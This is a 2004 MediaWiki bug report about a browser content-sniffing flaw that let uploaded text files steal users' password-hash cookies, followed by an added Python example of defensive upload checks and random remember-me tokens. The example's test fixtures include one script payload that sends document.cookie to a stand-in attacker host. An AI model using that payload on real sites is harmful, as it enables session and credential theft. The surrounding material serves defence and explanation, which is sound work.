Last modified: 2005-07-14 05:30:18 UTC

Bug 566 - serious security bug in mediawiki (Yaohua2000)
Product: MediaWiki
Classification: Unclassified
Component: General/Unknown
Hardware: All
OS: All
Priority: High
Severity: major
Target Milestone: ---
Assigned To: Nobody - You can work on this!
Depends on:
Blocks: javascript
Reported: 2004-09-23 10:59 UTC by Jerome Jamnicky
Modified: 2005-07-14 05:30 UTC
CC: 0 users

See Also:
Web browser: ---
Mobile Platform: ---


Description Jerome Jamnicky 2004-09-23 10:59:55 UTC
There is some kind of problem where someone may steal the md5 hash of your 
password, apparently.  It was reported by Yaohua2000 on #mediawiki but he 
cannot use bugzilla.  He gave this URL:
Comment 1 Domas Mituzas 2004-09-23 11:02:17 UTC
Well, servers give out Content-Type: text/plain, so that is a flaw of the browser,
if it handles non-text/html documents as HTML. On the other hand, all downloads
might be served from *, so *wikipedia or *wikimedia cookies
would not apply.
Comment 2 Jamesday 2004-09-23 12:17:11 UTC
Reporter noted that "I've tested on opera,safari,ie,camino (mac os x) and ie
(win32) and mozilla,konqueror (linux) only ie (on both mac and win32) and safari
with the problem".

Users of the affected browsers should not view the text file - their password
will be stolen if they do. Changing your password before you view it will cause the
new one to be stolen instead; then you can change it back later.
Comment 3 Brion Vibber 2004-10-10 09:25:54 UTC
Apparently no one remembered to update this bug report...

1.4cvs & 1.3.5 include stricter checks on uploads to help close the gaping holes
in IE, and we've moved the uploads on Wikipedia to an alternate domain for now
to reduce exposure to the main wikis.

1.4cvs now uses a generated token instead of the hashed hashed password for the
'remember my password' mode. This has also been backported to Wikipedia's
servers, but isn't yet included in 1.3 release as it makes some database
changes. This should be more secure against dictionary attacks to recover the
plaintext, but is still usable to login if you can snarf it.

In Windows XP SP2, IE now has a security option "Open files based on content,
not file extension". You might think that turning this off would close the
security hole, but unfortunately you'd be wrong; it still interprets ".txt" as
"it's okay to think this is HTML and run JavaScript, even though neither the
Content-Type header nor the 'extension' you think you see look like '.html' at
all". Sigh.
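The following is an added example, not code from MediaWiki or from any participant in this bug. It sketches two of the mitigations Brion describes in comment 3: a server-side upload check that rejects files whose leading bytes a content-sniffing browser would render as HTML regardless of the text/plain Content-Type, and a "remember me" cookie built from a random per-login token rather than anything derived from the password hash. The marker list, the 1024-byte sniffing window and the sample uploads are assumptions made for this illustration; they do not reproduce any browser's actual sniffing algorithm or MediaWiki's own check.

```python
"""Added example, not MediaWiki code: an anti-sniffing upload check plus a
random remember-me token.  Tag list, window size and samples are assumptions."""
import hashlib
import hmac
import re
import secrets

# Sniffing browsers decide on roughly the first kilobyte of the body;
# the exact window is an assumption for this example.
SNIFF_WINDOW = 1024

# Markers that would make a sniffing browser treat the body as HTML.
# Assumed list for illustration, not any browser's real heuristic.
HTML_MARKERS = [
    "<!doctype html", "<html", "<head", "<body", "<title", "<script",
    "<a href", "<img", "<iframe", "<object", "<embed", "<meta", "<table", "<pre",
]
_MARKER_RE = re.compile("|".join(re.escape(m) for m in HTML_MARKERS), re.IGNORECASE)


def _sniff_text(data: bytes) -> str:
    """Decode the leading bytes the way a lenient browser would.

    Honour UTF-8 and UTF-16 byte-order marks, and drop NUL bytes so that
    BOM-less UTF-16 ("<\\x00s\\x00c\\x00...") is still caught.
    """
    head = data[:SNIFF_WINDOW]
    if head.startswith(b"\xff\xfe"):
        text = head[2:].decode("utf-16-le", errors="replace")
    elif head.startswith(b"\xfe\xff"):
        text = head[2:].decode("utf-16-be", errors="replace")
    else:
        if head.startswith(b"\xef\xbb\xbf"):
            head = head[3:]
        text = head.decode("latin-1")  # never fails; we only look for ASCII tags
    return text.replace("\x00", "")


def find_html_marker(data: bytes):
    """Return the first HTML marker in the sniff window, lower-cased, or None."""
    m = _MARKER_RE.search(_sniff_text(data))
    return m.group(0).lower() if m else None


def is_safe_upload(data: bytes) -> bool:
    """Reject anything a sniffing browser might execute as HTML."""
    return find_html_marker(data) is None


def issue_remember_token():
    """Mint a random token for the 'remember me' cookie.

    Returns (cookie_value, stored_hash).  Only the hash goes in the database.
    Nothing is derived from the password, so a dictionary attack on a snarfed
    cookie learns nothing about it, and replacing the stored hash revokes the
    cookie without touching the password.
    """
    token = secrets.token_hex(16)
    return token, hashlib.sha256(token.encode()).hexdigest()


def check_remember_token(cookie_value: str, stored_hash: str) -> bool:
    """Constant-time comparison of the presented token against the stored hash."""
    presented = hashlib.sha256(cookie_value.encode()).hexdigest()
    return hmac.compare_digest(presented, stored_hash)


# Constructed sample uploads (assumed data for this example).
SAMPLE_UPLOADS = {
    "notes.txt": b"Meeting notes\nNothing unusual here.\n",
    "sneaky.txt": (b"Looks like text...\n"
                   b"<SCRIPT>new Image().src='http://attacker.invalid/?'+document.cookie</SCRIPT>\n"),
    "utf16.txt": "\ufeff<html><script>alert(1)</script>".encode("utf-16-le"),
}


def scan_uploads(uploads):
    """Map each file name to the marker that got it rejected (None if accepted)."""
    return {name: find_html_marker(body) for name, body in uploads.items()}


if __name__ == "__main__":
    for name, marker in scan_uploads(SAMPLE_UPLOADS).items():
        print(f"{name}: {'rejected (' + marker + ')' if marker else 'accepted'}")
    cookie, stored = issue_remember_token()
    print("remember-me check:", check_remember_token(cookie, stored))
```

The upload check deliberately errs on the side of rejection: it is cheaper to refuse a legitimate text file that happens to start with "<table" than to serve a script to a browser that ignores both the Content-Type header and the extension, which is exactly the IE behaviour the last paragraph of comment 3 describes. Serving uploads from a separate cookie-less domain, as comment 1 and comment 3 mention, remains the stronger defence because it makes the stolen-cookie outcome impossible even when the check misses.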
